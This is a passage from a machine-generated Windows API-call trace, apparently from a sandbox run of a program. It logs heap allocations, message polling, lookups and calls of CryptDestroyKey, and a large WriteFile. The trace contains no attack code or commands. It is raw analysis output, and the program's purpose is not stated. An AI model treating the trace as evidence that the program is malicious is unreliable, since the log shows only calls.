lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0179.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0179.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0179.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0179.964] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0179.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0179.964] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0179.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0179.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0179.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0179.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0179.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0179.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0179.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0179.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c08) returned 0xf5a020 [0180.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.031] WriteFile (in: hFile=0x2d0, lpBuffer=0xf5a020*, nNumberOfBytesToWrite=0xf0c08, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0xf5a020*, lpNumberOfBytesWritten=0x8cf5e4*=0xf0c08, lpOverlapped=0x0) returned 1 [0180.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0180.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf5a020 | out: hHeap=0x970000) returned 1 [0180.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0180.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0180.104] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0180.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0180.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0180.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0180.105] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0180.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0180.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0180.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0180.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0180.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0180.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0180.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0180.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0180.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0180.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0180.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0180.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0180.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0180.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0180.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0180.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0180.105] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0180.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0180.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d98 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0180.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0180.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0180.106] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0180.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0180.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0180.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0180.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0180.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0180.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0180.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0180.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0180.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0180.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0180.107] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0180.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0180.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0180.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0180.107] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0180.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0180.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0180.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0180.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0180.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0180.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0180.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0180.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0180.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0180.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0180.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0180.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0180.108] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0180.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0180.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0180.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0180.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0180.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0180.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0180.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0180.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0180.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0180.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0180.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0180.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0180.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0180.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0180.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0180.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0180.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0180.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0180.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0180.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e506e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0180.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0180.110] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0180.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0180.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0180.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0180.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0180.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0180.110] CryptDestroyKey (hKey=0xa874d0) returned 1 [0180.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0180.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0180.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0180.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0180.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0180.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0180.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0180.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0180.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0180.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0180.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0180.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0180.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0180.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0180.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0180.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0180.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0180.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0180.112] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0180.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0180.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0180.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0180.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0180.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0180.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0180.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0180.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0180.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0180.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0180.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0180.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0180.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0180.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0180.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0180.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0180.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0180.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0180.154] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0180.154] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0180.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0180.154] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0180.154] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0180.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0180.154] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0180.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0180.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0180.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0180.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0180.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0180.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0180.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0180.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0180.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0180.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0180.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0180.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0180.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0180.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0180.155] HeapFree (in: 